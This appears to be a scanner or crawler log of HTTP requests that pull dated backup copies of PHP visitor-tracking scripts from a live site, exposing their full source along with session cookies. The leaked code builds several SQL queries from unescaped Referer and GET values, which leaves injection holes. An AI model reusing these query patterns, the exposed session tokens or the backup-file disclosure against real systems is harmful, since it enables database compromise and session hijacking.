if (strpos($currentUrl, '?') !== false) {
$currentUrlNoQuery = substr($currentUrl, 0, strpos($currentUrl, '?'));
} else {
$currentUrlNoQuery = $currentUrl;
}

$ip = $_SERVER['REMOTE_ADDR'];

// Referrer
if (isset($in_referrer)) {
if (strpos($in_referrer, '?') !== false) {
$in_referrerNoQuery = substr($in_referrer, 0, strpos($in_referrer, '?'));
} else {
$in_referrerNoQuery = $in_referrer;
}
} else {
$in_referrer = '';
$in_referrerNoQuery = '';
}

// Title of the page
if (!isset($in_title)) {
$in_title = '';
}

// blvdC - Campaign ID, if any
if (!isset($in_blvdC)) {
$in_blvdC = 0;
}

if (isset($in_screenWidth)) {
$in_screenWidth = (int)$in_screenWidth;
} else {
$in_screenWidth = 0;
}
if (isset($in_screenHeight)) {
$in_screenHeight = (int)$in_screenHeight;
} else {
$in_screenHeight = 0;
}
if (isset($in_screenDepth)) {
$in_screenDepth = (int)$in_screenDepth;
} else {
$in_screenDepth = 0;
}

$userAgent = $dbConnection->escape_string($_SERVER['HTTP_USER_AGENT']);
echo "//UA: $userAgent\n";

// If we have received a session id, maintain it, otherwise
// generate a new one
if (isset($in_blvdSessionId)) {
$sessionId = $in_blvdSessionId;
} else {
$sessionId = '';
}

echo "//Sess set.\n";

// Convert the domain name into a domain ID
// (If this fails, the domain ID will remain set to 0)
$domainId = 0;

$domainIdResults = $dbConnection->query(
"SELECT ConvertDomainNameToDomainID(DomainNameFromURL('$currentUrl')) AS `ID`"
);

// Tread carefully here, so errors don't break tracking!
if ($dbConnection->errno == 0) {
$domainIdData = $domainIdResults->fetch_object();
if ($domainIdData) {
$domainId = (int)$domainIdData->ID;
}
}

// We're done if the domain isn't found.
if ($domainId == 0) {
die("//DNR\n");
}

// If this is a new session, generate a unique ID for it, and store it in
// the database
if ($sessionId == '') {
$sessionId = uniqid("", true);

// Query GeoIP data for the user's IP Address
$geoRecord = geoip_record_by_name($ip);

if ($geoRecord === false) {
$geoData = new stdclass();
$geoData->CountryCode = '';
$geoData->Region = '';
$geoData->City = '';
$geoData->PostalCode = '';
$geoData->Latitude = '';
$geoData->Longitude = '';
$geoData->DMACode = '';
$geoData->AreaCode = '';
$geoData->ISP = '';
} else {
$geoData = new stdclass();
$geoData->CountryCode = $geoRecord['country_code'];
$geoData->Region = $geoRecord['region'];
$geoData->City = $geoRecord['city'];
$geoData->PostalCode = $geoRecord['postal_code'];
$geoData->Latitude = $geoRecord['latitude'];
$geoData->Longitude = $geoRecord['longitude'];
$geoData->DMACode = $geoRecord['dma_code'];
$geoData->AreaCode = $geoRecord['area_code'];
$geoData->ISP = geoip_isp_by_name($ip);
}

// Bind the session ID to the user's IP address
$dbConnection->query(
<<<EOQ
INSERT INTO `sessions`(
SessionID, IPAddress, SessionStartTime, ReferringURL, DomainID,
ScreenWidth, ScreenHeight, ScreenDepth, UserAgent,
GeoIPCountryCode, GeoIPRegion, GeoIPCity, GeoIPPostalCode,
GeoIPLatitude, GeoIPLongitude, GeoIPDMACode, GeoIPAreaCode,
GeoIPISP
)
VALUES(
'$sessionId', '$ip', UNIX_TIMESTAMP(), '$in_referrer', '$domainId',
'$in_screenWidth', '$in_screenHeight', '$in_screenDepth', '$userAgent',
'$geoData->CountryCode', '$geoData->Region', '$geoData->City', '$geoData->PostalCode',
'$geoData->Latitude', '$geoData->Longitude', '$geoData->DMACode', '$geoData->AreaCode',
'$geoData->ISP'
)
EOQ
);

echo "//Sess: " . $dbConnection->error . "\n";

// If necessary, store the user agent information in the 'user_agent_data'
// table.
$ua = get_browser($userAgent);
$browserName = $dbConnection->escape_string($ua->browser);
$browserVersion = $dbConnection->escape_string($ua->version);
$platform = $dbConnection->escape_string($ua->platform);

$dbConnection->query(
<<<EOQ
INSERT IGNORE INTO `user_agent_data`(
`UA`, `BrowserName`, `BrowserVersion`, `Platform`
)
VALUES(
'$userAgent', '$browserName', '$browserVersion', '$platform'
)
EOQ
);

echo "//UA: " . $dbConnection->error . "\n";
}

// *********************************
// Process campaigns for this domain
// *********************************

$matchedCampaigns = array();

echo "//D: $domainId\n";

// Retrieve all of the campaigns
if ($domainId > 0) {
$campaignResults = $dbConnection->query(
"SELECT * FROM `campaigns` WHERE `Active` = 1 AND `DomainID` = '$domainId'"
);

echo '//CRes: ' . $dbConnection->error . "\n";

while($campaign = $campaignResults->fetch_object()) {
//echo "//$campaign->Title \n";
$campaignId = $campaign->ID;

// Get all the triggers for the campaign
$triggerResults = $dbConnection->query(
"SELECT * FROM `campaign_triggers` WHERE `Active` = '1' AND `CampaignID` = '$campaignId'"
);

while($trigger = $triggerResults->fetch_object()) {
//echo "// ($campaign->IdentifierType)\n";

if ($trigger->IdentifierType == 'Parameter') {
// Parameter-based campaign
//echo "//Parameter based.\n";

$matched = false;

// Does the URL match the base URL defined by the
// campaign? (Skip this step if the URL is defined as '*')
if ($trigger->URL != '*') {
// TODO
}

// Parse the URL and extract the query string
$queryString = substr(
$currentUrl,
strpos($currentUrl, '?') + 1
);

$parameters = array();
parse_str($queryString, $parameters);

// Check if the parameter to check exists and then
// check if it is equal to the defined value
if (isset($parameters[$trigger->ParameterToCheck])) {
if ($parameters[$trigger->ParameterToCheck] == $trigger->ValueToCheck) {
$matched = true;
}
}

// If we matched, add the campaign ID to the campaign list
if ($matched) {
//echo "//Matched\n";
$matchedCampaigns[] = $campaignId;
}
} else if ($trigger->IdentifierType == 'URL') {
// Are we checking the current or referring URL? If not, this
// campaign will need to be handled by the "leave.php" script!
if ($trigger->TriggerType == 'CurrentPage') {
$urlToCheck = $currentUrl;
$urlToCheckNoQuery = $currentUrlNoQuery;
} else if ($trigger->TriggerType == 'CameFrom') {
$urlToCheck = $in_referrer;
$urlToCheckNoQuery = $in_referrerNoQuery;
} else {
continue;
}

if ($trigger->IgnoreQueryString == '1') {
if ($urlToCheckNoQuery == $trigger->URL) {
$matchedCampaigns[] = $campaignId;
}
} else {
if ($urlToCheck == $trigger->URL) {
$matchedCampaigns[] = $campaignId;
}
}
}
}
}
}

// XXXX: This is not the correct way to handle this -- need to add multiple
// campaign support to the database!
echo "//BLVDC: $in_blvdC\n\n";
if ($in_blvdC == 0 && count($matchedCampaigns) > 0) {
$in_blvdC = $matchedCampaigns[0];
}

// Look for the previous hit for this session
$lastNavigationResults = $dbConnection->query(
<<<EOQ
SELECT *
FROM
`navigation` n
WHERE
n.`SessionID` = '$sessionId'
ORDER BY
n.`ID` DESC
LIMIT 1
EOQ
);

$lastNavigationItem = $lastNavigationResults->fetch_object();
if ($lastNavigationItem) {
if ((int)$lastNavigationItem->DepartureTime == 0) {
// Use the arrival time for this page as the departure time for the
// previous navigation item (this is not exact, but it is a good
// guess).
$dbConnection->query(
"UPDATE `navigation` " .
"SET `DepartureTime` = UNIX_TIMESTAMP() " .
"WHERE `ID` = '$lastNavigationItem->ID'"
);
echo "//LNI + DT: " . $dbConnection->error . " \n";
}
}

// Store this page hit
$safeTitle = $dbConnection->escape_string($in_title);
$safeCurrentUrl = $dbConnection->escape_string($currentUrl);
$safeReferrer = $dbConnection->escape_string($in_referrer);

$dbConnection->query(
<<<EOQ
INSERT INTO navigation(
`CameFrom`, `ReferrerDomain`, `CurrentPage`, `CurrentPageTitle`,
`ArrivalTime`, `SessionID`, `CurrentPageCampaignID`,
`DomainID`,
`ArrivalYear`, `ArrivalMonth`,
`ArrivalDay`, `ArrivalHour`,
`ArrivalWeekOfYear`
)
VALUES(
'$in_referrer', DomainNameFromURL('$safeReferrer'), '$safeCurrentUrl', '$safeTitle',
UNIX_TIMESTAMP(), '$sessionId', '$in_blvdC',
ConvertDomainNameToDomainId(DomainNameFromURL('$safeCurrentUrl')),
YEAR(FROM_UNIXTIME(UNIX_TIMESTAMP())), MONTH(FROM_UNIXTIME(UNIX_TIMESTAMP())),
DAY(FROM_UNIXTIME(UNIX_TIMESTAMP())), HOUR(FROM_UNIXTIME(UNIX_TIMESTAMP())),
WEEK(FROM_UNIXTIME(UNIX_TIMESTAMP()), 6)
)
EOQ
);

echo '//StoreNav: ' . $dbConnection->error . "\n";

// Get the ID of the newly generated navigation row
$navigationId = $dbConnection->insert_id;
//echo "//NID: $navigationId\n";

// Store campaign information for the session, if applicable
if ($in_blvdC > 0) {
$dbConnection->query(
<<<EOQ
INSERT INTO session_campaigns(SessionID, NavigationID, CampaignID, TimeOfConversion)
VALUES('$sessionId', '$navigationId', '$in_blvdC', UNIX_TIMESTAMP())
EOQ
);
}

// Process search engine information
findSearchEngineData($dbConnection, $in_referrer, $navigationId);

// Tracking flags are blank for this script right now
$trackingFlags = 0;

require('trackingJS.php');

?>

- /blvdstatus/js/dynamicJS.php_2008_08_12_r1

/blvdstatus/js/dynamicJS.php_2008_08_12_r1

http://www.seoq.com/blvdstatus/js/dynamicJS.php_2008_08_12_r1

Request

GET /blvdstatus/js/dynamicJS.php_2008_08_12_r1 HTTP/1.1
Referer: http://www.seoq.com/blvdstatus/js/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.seoq.com
Cookie: PHPSESSID=sgei1l6e3nst43jti7f9ug76f0; CAKEPHP=3gmt3q74fne0s72akqsevm8685; temp_orgid=18bc00d6479f52c3222ea5887bfd07d0; temp_userid=42eb0c6051822e446cfea254f0248163
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:34:16 GMT
Server: Apache
Last-Modified: Wed, 06 Aug 2008 12:54:47 GMT
ETag: "2548016-28e4-453ca13c4b3c0"
Accept-Ranges: bytes
Content-Length: 10468
Keep-Alive: timeout=15, max=91
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

<?php
header('Content-type: text/javascript');

require_once("../inc/serverSetup.php");
require_once("../inc/database.php");

require_once("../lib/processing/findSearchEngineData.php");

if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on') {
define('DYNAMIC_URL_BASE', URL_BLVD_BASE_SECURE);
} else {
define('DYNAMIC_URL_BASE', URL_BLVD_BASE);
}

import_request_variables('g', 'in_');

// Query the referrer URL (which in this case is the current page
// on the client's site) and visitor's IP address
if (isset($_SERVER['HTTP_REFERER'])) {
$currentUrl = $_SERVER['HTTP_REFERER'];
} else {
$currentUrl = '';
}

// We bail out completely here if the URL points at one of the tracking
// scripts -- it's unclear why these URLs are being accessed directly by
// some sites, but they are always incorrectly tracked.
if (strpos('@https?://www.blvdstatus.com/js@', $currentUrl)) {
die();
}

// Get a version of the URL with no query string
if (strpos($currentUrl, '?') !== false) {
$currentUrlNoQuery = substr($currentUrl, 0, strpos($currentUrl, '?'));
} else {
$currentUrlNoQuery = $currentUrl;
}

$ip = $_SERVER['REMOTE_ADDR'];

// Referrer
if (isset($in_referrer)) {
if (strpos($in_referrer, '?') !== false) {
$in_referrerNoQuery = substr($in_referrer, 0, strpos($in_referrer, '?'));
} else {
$in_referrerNoQuery = $in_referrer;
}
} else {
$in_referrer = '';
$in_referrerNoQuery = '';
}

// Title of the page
if (!isset($in_title)) {
$in_title = '';
}

// blvdC - Campaign ID, if any
if (!isset($in_blvdC)) {
$in_blvdC = 0;
}

if (isset($in_screenWidth)) {
$in_screenWidth = (int)$in_screenWidth;
} else {
$in_screenWidth = 0;
}
if (isset($in_screenHeight)) {
$in_screenHeight = (int)$in_screenHeight;
} else {
$in_screenHeight = 0;
}
if (isset($in_screenDepth)) {
$in_screenDepth = (int)$in_screenDepth;
} else {
$in_screenDepth = 0;
}

$userAgent = $dbConnection->escape_string($_SERVER['HTTP_USER_AGENT']);
echo "//UA: $userAgent\n";

// If we have received a session id, maintain it, otherwise
// generate a new one
if (isset($in_blvdSessionId)) {
$sessionId = $in_blvdSessionId;
} else {
$sessionId = '';
}

echo "//Sess set.\n";

// Convert the domain name into a domain ID
// (If this fails, the domain ID will remain set to 0)
$domainId = 0;

$domainIdResults = $dbConnection->query(
"SELECT ConvertDomainNameToDomainID(DomainNameFromURL('$currentUrl')) AS `ID`"
);

// Tread carefully here, so errors don't break tracking!
if ($dbConnection->errno == 0) {
$domainIdData = $domainIdResults->fetch_object();
if ($domainIdData) {
$domainId = (int)$domainIdData->ID;
}
}

// We're done if the domain isn't found.
if ($domainId == 0) {
die("//DNR\n");
}

// If this is a new session, generate a unique ID for it, and store it in
// the database
if ($sessionId == '') {
$sessionId = uniqid("", true);

// Query GeoIP data for the user's IP Address
$geoRecord = geoip_record_by_name($ip);

if ($geoRecord === false) {
$geoData = new stdclass();
$geoData->CountryCode = '';
$geoData->Region = '';
$geoData->City = '';
$geoData->PostalCode = '';
$geoData->Latitude = '';
$geoData->Longitude = '';
$geoData->DMACode = '';
$geoData->AreaCode = '';
$geoData->ISP = '';
} else {
$geoData = new stdclass();
$geoData->CountryCode = $geoRecord['country_code'];
$geoData->Region = $geoRecord['region'];
$geoData->City = $geoRecord['city'];
$geoData->PostalCode = $geoRecord['postal_code'];
$geoData->Latitude = $geoRecord['latitude'];
$geoData->Longitude = $geoRecord['longitude'];
$geoData->DMACode = $geoRecord['dma_code'];
$geoData->AreaCode = $geoRecord['area_code'];
$geoData->ISP = geoip_isp_by_name($ip);
}

// Bind the session ID to the user's IP address
$dbConnection->query(
<<<EOQ
INSERT INTO `sessions`(
SessionID, IPAddress, SessionStartTime, ReferringURL, DomainID,
ScreenWidth, ScreenHeight, ScreenDepth, UserAgent,
GeoIPCountryCode, GeoIPRegion, GeoIPCity, GeoIPPostalCode,
GeoIPLatitude, GeoIPLongitude, GeoIPDMACode, GeoIPAreaCode,
GeoIPISP
)
VALUES(
'$sessionId', '$ip', UNIX_TIMESTAMP(), '$in_referrer', '$domainId',
'$in_screenWidth', '$in_screenHeight', '$in_screenDepth', '$userAgent',
'$geoData->CountryCode', '$geoData->Region', '$geoData->City', '$geoData->PostalCode',
'$geoData->Latitude', '$geoData->Longitude', '$geoData->DMACode', '$geoData->AreaCode',
'$geoData->ISP'
)
EOQ
);

echo "//Sess: " . $dbConnection->error . "\n";

// If necessary, store the user agent information in the 'user_agent_data'
// table.
$ua = get_browser($userAgent);
$browserName = $dbConnection->escape_string($ua->browser);
$browserVersion = $dbConnection->escape_string($ua->version);
$platform = $dbConnection->escape_string($ua->platform);

$dbConnection->query(
<<<EOQ
INSERT IGNORE INTO `user_agent_data`(
`UA`, `BrowserName`, `BrowserVersion`, `Platform`
)
VALUES(
'$userAgent', '$browserName', '$browserVersion', '$platform'
)
EOQ
);

echo "//UA: " . $dbConnection->error . "\n";
}

// *********************************
// Process campaigns for this domain
// *********************************

$matchedCampaigns = array();

echo "//D: $domainId\n";

// Retrieve all of the campaigns
if ($domainId > 0) {
$campaignResults = $dbConnection->query(
"SELECT * FROM `campaigns` WHERE `Active` = 1 AND `DomainID` = '$domainId'"
);

echo '//CRes: ' . $dbConnection->error . "\n";

while($campaign = $campaignResults->fetch_object()) {
//echo "//$campaign->Title \n";
$campaignId = $campaign->ID;

// Get all the triggers for the campaign
$triggerResults = $dbConnection->query(
"SELECT * FROM `campaign_triggers` WHERE `Active` = '1' AND `CampaignID` = '$campaignId'"
);

while($trigger = $triggerResults->fetch_object()) {
//echo "// ($campaign->IdentifierType)\n";

if ($trigger->IdentifierType == 'Parameter') {
// Parameter-based campaign
//echo "//Parameter based.\n";

$matched = false;

// Does the URL match the base URL defined by the
// campaign? (Skip this step if the URL is defined as '*')
if ($trigger->URL != '*') {
// TODO
}

// Parse the URL and extract the query string
$queryString = substr(
$currentUrl,
strpos($currentUrl, '?') + 1
);

$parameters = array();
parse_str($queryString, $parameters);

// Check if the parameter to check exists and then
// check if it is equal to the defined value
if (isset($parameters[$trigger->ParameterToCheck])) {
if ($parameters[$trigger->ParameterToCheck] == $trigger->ValueToCheck) {
$matched = true;
}
}

// If we matched, add the campaign ID to the campaign list
if ($matched) {
//echo "//Matched\n";
$matchedCampaigns[] = $campaignId;
}
} else if ($trigger->IdentifierType == 'URL') {
// Are we checking the current or referring URL? If not, this
// campaign will need to be handled by the "leave.php" script!
if ($trigger->TriggerType == 'CurrentPage') {
$urlToCheck = $currentUrl;
$urlToCheckNoQuery = $currentUrlNoQuery;
} else if ($trigger->TriggerType == 'CameFrom') {
$urlToCheck = $in_referrer;
$urlToCheckNoQuery = $in_referrerNoQuery;
} else {
continue;
}

if ($trigger->IgnoreQueryString == '1') {
if ($urlToCheckNoQuery == $trigger->URL) {
$matchedCampaigns[] = $campaignId;
}
} else {
if ($urlToCheck == $trigger->URL) {
$matchedCampaigns[] = $campaignId;
}
}
}
}
}
}

// XXXX: This is not the correct way to handle this -- need to add multiple
// campaign support to the database!
echo "//BLVDC: $in_blvdC\n\n";
if ($in_blvdC == 0 && count($matchedCampaigns) > 0) {
$in_blvdC = $matchedCampaigns[0];
}

// Look for the previous hit for this session
$lastNavigationResults = $dbConnection->query(
<<<EOQ
SELECT *
FROM
`navigation` n
WHERE
n.`SessionID` = '$sessionId'
ORDER BY
n.`ID` DESC
LIMIT 1
EOQ
);

$lastNavigationItem = $lastNavigationResults->fetch_object();
if ($lastNavigationItem) {
if ((int)$lastNavigationItem->DepartureTime == 0) {
// Use the arrival time for this page as the departure time for the
// previous navigation item (this is not exact, but it is a good
// guess).
$dbConnection->query(
"UPDATE `navigation` " .
"SET `DepartureTime` = UNIX_TIMESTAMP() " .
"WHERE `ID` = '$lastNavigationItem->ID'"
);
echo "//LNI + DT: " . $dbConnection->error . " \n";
}
}

// Store this page hit
$safeTitle = $dbConnection->escape_string($in_title);
$safeCurrentUrl = $dbConnection->escape_string($currentUrl);
$safeReferrer = $dbConnection->escape_string($in_referrer);

$dbConnection->query(
<<<EOQ
INSERT INTO navigation(
`CameFrom`, `ReferrerDomain`, `CurrentPage`, `CurrentPageTitle`,
`ArrivalTime`, `SessionID`, `CurrentPageCampaignID`,
`DomainID`,
`ArrivalYear`, `ArrivalMonth`,
`ArrivalDay`, `ArrivalHour`,
`ArrivalWeekOfYear`
)
VALUES(
'$in_referrer', DomainNameFromURL('$safeReferrer'), '$safeCurrentUrl', '$safeTitle',
UNIX_TIMESTAMP(), '$sessionId', '$in_blvdC',
ConvertDomainNameToDomainId(DomainNameFromURL('$safeCurrentUrl')),
YEAR(FROM_UNIXTIME(UNIX_TIMESTAMP())), MONTH(FROM_UNIXTIME(UNIX_TIMESTAMP())),
DAY(FROM_UNIXTIME(UNIX_TIMESTAMP())), HOUR(FROM_UNIXTIME(UNIX_TIMESTAMP())),
WEEK(FROM_UNIXTIME(UNIX_TIMESTAMP()), 6)
)
EOQ
);

echo '//StoreNav: ' . $dbConnection->error . "\n";

// Get the ID of the newly generated navigation row
$navigationId = $dbConnection->insert_id;
//echo "//NID: $navigationId\n";

// Store campaign information for the session, if applicable
if ($in_blvdC > 0) {
$dbConnection->query(
<<<EOQ
INSERT INTO session_campaigns(SessionID, NavigationID, CampaignID, TimeOfConversion)
VALUES('$sessionId', '$navigationId', '$in_blvdC', UNIX_TIMESTAMP())
EOQ
);
}

// Process search engine information
findSearchEngineData($dbConnection, $in_referrer, $navigationId);

// Tracking flags are blank for this script right now
$trackingFlags = 0;

require('trackingJS.php');

?>

- /blvdstatus/js/initBlvdJS.php_2008_07_25_r1

/blvdstatus/js/initBlvdJS.php_2008_07_25_r1

http://www.seoq.com/blvdstatus/js/initBlvdJS.php_2008_07_25_r1

Request

GET /blvdstatus/js/initBlvdJS.php_2008_07_25_r1 HTTP/1.1
Referer: http://www.seoq.com/blvdstatus/js/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.seoq.com
Cookie: PHPSESSID=sgei1l6e3nst43jti7f9ug76f0; CAKEPHP=3gmt3q74fne0s72akqsevm8685; temp_orgid=18bc00d6479f52c3222ea5887bfd07d0; temp_userid=42eb0c6051822e446cfea254f0248163
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:34:17 GMT
Server: Apache
Last-Modified: Wed, 25 Jun 2008 16:40:10 GMT
ETag: "2548021-eb6-4508054778e80"
Accept-Ranges: bytes
Content-Length: 3766
Keep-Alive: timeout=15, max=97
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

<?php
//header('Location: http://69.12.4.242/js/initBlvdJS.php');

header('Content-type: text/javascript');

require_once("../inc/serverSetup.php");
?>

/*
* Digg friendly URLEncode function -- taken from:
* http://cass-hacks.com/articles/code/js_url_encode_decode/
* [CB] Modified to use %20 instead of + for spaces
*/
function URLEncode (clearString) {
var output = '';
var x = 0;
clearString = clearString.toString();
var regex = /(^[a-zA-Z0-9_.]*)/;
while (x < clearString.length) {
var match = regex.exec(clearString.substr(x));
if (match != null && match.length > 1 && match[1] != '') {
output += match[1];
x += match[1].length;
} else {
if (clearString[x] == ' ')
output += '%20';
else {
var charCode = clearString.charCodeAt(x);
var hexVal = charCode.toString(16);
output += '%' + ( hexVal.length < 2 ? '0' : '' ) + hexVal.toUpperCase();
}
x++;
}
}

return output;
}

/*
* Cookie functions -- taken from:
* http://www.quirksmode.org/js/cookies.html
*/
function createCookie(name,value,days) {
if (days) {
var date = new Date();
date.setTime(date.getTime()+(days*24*60*60*1000));
var expires = "; expires="+date.toGMTString();
}
else var expires = "";
document.cookie = name+"="+value+expires+"; path=/";
}

/*
* Cookie functions -- modified from:
* http://www.quirksmode.org/js/cookies.html
*/
function createShortTermCookie(name,value,minutes) {
if (minutes) {
var date = new Date();
date.setTime(date.getTime()+(minutes*60*1000));
var expires = "; expires="+date.toGMTString();
}
else var expires = "";
document.cookie = name+"="+value+expires+"; path=/";
}

/*
* Returns the value of the named cookie, or null if no such cookie
* exists.
*/
function readCookie(name) {
var nameEQ = name + "=";
var ca = document.cookie.split(';');
for(var i=0;i < ca.length;i++) {
var c = ca[i];
while (c.charAt(0)==' ') c = c.substring(1,c.length);
if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
}
return null;
}

/*
* Deletes the specified cookie.
*/
function eraseCookie(name) {
createCookie(name,"",-1);
}

/*
* Utility function to test if another object is actually a function.
*/
function isFunction(object) {
return (object && typeof(object) == 'function');
}

/*
* The afterLoad function, which is responsible for triggering the
* dynamic JavaScript pull.
*/
function afterLoad() {
// We call all the existing onload functions _first_,
// in the hope that if they modify the document we
// will catch the changes.
if (isFunction(chain_onload)) {
chain_onload();
}

// Check and see if we have a BLVD session cookie,
// if so, maintain that session value. If not, a session
// value will be generated by the PHP script.
var blvdSessionId = readCookie("blvdSessionId");
if (blvdSessionId == null) blvdSessionId = '';

// Generate the dynamic javascript tag
var scriptTag = document.createElement("script");
scriptTag.src =
"<?php echo URL_BLVD_BASE; ?>js/dynamicJS.php" +
"?blvdSessionId=" + blvdSessionId +
"&referrer=" + URLEncode(document.referrer) +
"&title=" + URLEncode(document.title) +
"&screenWidth=" + screen.width +
"&screenHeight=" + screen.height +
"&screenDepth=" + screen.colorDepth
;

var bodyNode = document.getElementsByTagName("body")[0];
bodyNode.appendChild(scriptTag);
}

/*
* Chain the BLVD afterLoad function into the OnLoad event handler.
* We store the current OnLoad handler first so we can call it
* from our own function.
*/
var chain_onload = window.onload;
window.onload = afterLoad;

- /blvdstatus/js/initBlvdJS.php_2008_07_30_r1

/blvdstatus/js/initBlvdJS.php_2008_07_30_r1

http://www.seoq.com/blvdstatus/js/initBlvdJS.php_2008_07_30_r1

Request

GET /blvdstatus/js/initBlvdJS.php_2008_07_30_r1 HTTP/1.1
Referer: http://www.seoq.com/blvdstatus/js/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.seoq.com
Cookie: PHPSESSID=sgei1l6e3nst43jti7f9ug76f0; CAKEPHP=3gmt3q74fne0s72akqsevm8685; temp_orgid=18bc00d6479f52c3222ea5887bfd07d0; temp_userid=42eb0c6051822e446cfea254f0248163
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:34:17 GMT
Server: Apache
Last-Modified: Tue, 29 Jul 2008 17:39:19 GMT
ETag: "2548022-fd8-4532d1e9bbfc0"
Accept-Ranges: bytes
Content-Length: 4056
Keep-Alive: timeout=15, max=88
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

<?php
header('Content-type: text/javascript');

require_once("../inc/serverSetup.php");

if ($_SERVER['HTTPS'] === 'on') {
define('DYNAMIC_URL_BASE', URL_BLVD_BASE_SECURE);
} else {
define('DYNAMIC_URL_BASE', URL_BLVD_BASE);
}

?>

/*
* Digg friendly URLEncode function -- taken from:
* http://cass-hacks.com/articles/code/js_url_encode_decode/
* [CB] Modified to use %20 instead of + for spaces
*/
function URLEncode (clearString) {
var output = '';
var x = 0;
clearString = clearString.toString();
var regex = /(^[a-zA-Z0-9_.]*)/;
while (x < clearString.length) {
var match = regex.exec(clearString.substr(x));
if (match != null && match.length > 1 && match[1] != '') {
output += match[1];
x += match[1].length;
} else {
if (clearString[x] == ' ')
output += '%20';
else {
var charCode = clearString.charCodeAt(x);
var hexVal = charCode.toString(16);
output += '%' + ( hexVal.length < 2 ? '0' : '' ) + hexVal.toUpperCase();
}
x++;
}
}

return output;
}

/*
* Cookie functions -- taken from:
* http://www.quirksmode.org/js/cookies.html
*/
function createCookie(name,value,days) {
if (days) {
var date = new Date();
date.setTime(date.getTime()+(days*24*60*60*1000));
var expires = "; expires="+date.toGMTString();
}
else var expires = "";
document.cookie = name+"="+value+expires+"; path=/";
}

/*
* Cookie functions -- modified from:
* http://www.quirksmode.org/js/cookies.html
*/
function createShortTermCookie(name,value,minutes) {
if (minutes) {
var date = new Date();
date.setTime(date.getTime()+(minutes*60*1000));
var expires = "; expires="+date.toGMTString();
}
else var expires = "";
document.cookie = name+"="+value+expires+"; path=/";
}

/*
* Returns the value of the named cookie, or null if no such cookie
* exists.
*/
function readCookie(name) {
var nameEQ = name + "=";
var ca = document.cookie.split(';');
for(var i=0;i < ca.length;i++) {
var c = ca[i];
while (c.charAt(0)==' ') c = c.substring(1,c.length);
if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
}
return null;
}

/*
* Deletes the specified cookie.
*/
function eraseCookie(name) {
createCookie(name,"",-1);
}

/*
* Utility function to test if another object is actually a function.
*/
function isFunction(object) {
return (object && typeof(object) == 'function');
}

/*
* The afterLoad function, which is responsible for triggering the
* dynamic JavaScript pull.
*/
function afterLoad() {
// We call all the existing onload functions _first_,
// in the hope that if they modify the document we
// will catch the changes.
if (isFunction(chain_onload)) {
chain_onload();
}

// Check and see if we have a BLVD session cookie,
// if so, maintain that session value. If not, a session
// value will be generated by the PHP script.
var blvdSessionId = readCookie("blvdSessionId");
if (blvdSessionId == null) blvdSessionId = '';

// Generate the dynamic javascript tag
var scriptTag = document.createElement("script");
scriptTag.src =
"<?php echo DYNAMIC_URL_BASE; ?>js/dynamicJS.php" +
"?blvdSessionId=" + blvdSessionId +
"&referrer=" + URLEncode(document.referrer) +
"&title=" + URLEncode(document.title) +
"&screenWidth=" + screen.width +
"&screenHeight=" + screen.height +
"&screenDepth=" + screen.colorDepth
;

var bodyNode = document.getElementsByTagName("body")[0];
bodyNode.appendChild(scriptTag);
}

/*
* Chain the BLVD afterLoad function into the OnLoad event handler.
* We store the current OnLoad handler first so we can call it
* from our own function.
*/

if (isFunction(window.addEventListener)) {
window.addEventListener('load', afterLoad, false);
} else if (isFunction(window.attachEvent)) {
window.attachEvent('load', afterLoad);
} else {
var chain_onload = window.onload;
window.onload = afterLoad;
}

- /blvdstatus/js/dynamicJS.php_2008_08_22_r1

/blvdstatus/js/dynamicJS.php_2008_08_22_r1

http://www.seoq.com/blvdstatus/js/dynamicJS.php_2008_08_22_r1

Request

GET /blvdstatus/js/dynamicJS.php_2008_08_22_r1 HTTP/1.1
Referer: http://www.seoq.com/blvdstatus/js/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.seoq.com
Cookie: PHPSESSID=sgei1l6e3nst43jti7f9ug76f0; CAKEPHP=3gmt3q74fne0s72akqsevm8685; temp_orgid=18bc00d6479f52c3222ea5887bfd07d0; temp_userid=42eb0c6051822e446cfea254f0248163
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:34:16 GMT
Server: Apache
Last-Modified: Tue, 12 Aug 2008 19:52:07 GMT
ETag: "2548017-29ff-454489b5107c0"
Accept-Ranges: bytes
Content-Length: 10751
Keep-Alive: timeout=15, max=90
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

<?php
header('Content-type: text/javascript');

require_once("../inc/serverSetup.php");
require_once("../inc/database.php");

require_once("../lib/processing/findSearchEngineData.php");

if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on') {
define('DYNAMIC_URL_BASE', URL_BLVD_BASE_SECURE);
} else {
define('DYNAMIC_URL_BASE', URL_BLVD_BASE);
}

import_request_variables('g', 'in_');

// Determine if internal tracking is allowed
if (isset($in_ait) && $in_ait == 'true') {
$allowInternalTracking = true;
} else {
$allowInternalTracking = false;
}

// Query the referrer URL (which in this case is the current page
// on the client's site) and visitor's IP address
if (isset($_SERVER['HTTP_REFERER'])) {
$currentUrl = $_SERVER['HTTP_REFERER'];
} else {
$currentUrl = '';
}

// Find out if we are hitting an internal page
if (strpos($currentUrl, 'blvdstatus.com') !== false) {
$internalHit = true;
} else {
$internalHit = false;
}

echo "//IH: $internalHit / $allowInternalTracking \n";

